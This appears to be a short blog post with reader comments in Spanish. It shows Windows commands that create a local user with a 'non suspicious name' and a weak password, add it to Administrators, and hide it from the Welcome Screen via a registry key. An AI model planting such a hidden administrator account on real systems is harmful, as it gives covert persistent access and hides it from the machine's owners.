How to add a user in Windows CLI and hide it!

How to add a user in Windows CLI and hide it!

This can become a time saver for sysadmins and security professionals

We are assuming you have privileges on the machine to add users/groups. It’s real easy, just use the net command to add users and groups to the machine:

Create a user with a non suspicious name

  • net user HelpDeskSupport pass1234 /add

Add it to the local Administrators group

  • net localgroup Administrators HelpDeskSupport /add

After you do this if the computer is not part of a domain probably will have the Welcome Screen enabled and the user you just added will appear immediately in it. So …

Hide it from the Welcome Screen

reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList” /v HelpDeskSupport /t REG_DWORD /d 0 /f

This is not just an evil thing to do, if you have service accounts on the machine this way you can hide it from nosy users.

This will work with windows XP/2003/2008/Vista/7 (haven’t tried with Windows 8)

Hope this helps!

JQ

2 thoughts on “How to add a user in Windows CLI and hide it!”

  1. En windows 8 te va a dar error en el comando de añadir el usuario local ya que la contraseña no cumple con los requisitos ya que es muy sencilla. Los comandos segun vi no me dieron error excepto por lo del password.

    Tengo una maquina virtual pegada a un dominio y corri los comandos pero la cuenta sigue apareciendo en el welcome screen. No se si estuviera en un workgroup funcionara. Si trato te dejo saber.

    Voy a tomar el 70-410 el 23 para certificarme en Server 2012 deseame suerte ;)

    Gracias por el tip :D

    1. Si, es tan facil como utilizar Pass1234 y cumples con la complejidad lo que demuestra que la complejidad no aporta mucho cuando tienes un limite minimo de 8 chars. Por tal razon se deben utilizar de 16 chars en adelante y esto obliga al sistema a no generar el LM Hash que nos persigue desde Windows 9x.

      Sobre el welcome screen puede ser tricky si la “PC” es parte del dominio los GPOs del mismo tienen prioridad sobre los cambios locales, por ejemplo “Require CTRL+ALT+DEL to Logon” o talvez algun programa pudo haber modificado en “GINA” de Windows.

      Pero dejame saber lo que averigues.

      Suerte en tu examen!

      JQ

Leave a Reply

Your email address will not be published. Required fields are marked *

Time limit is exhausted. Please reload CAPTCHA.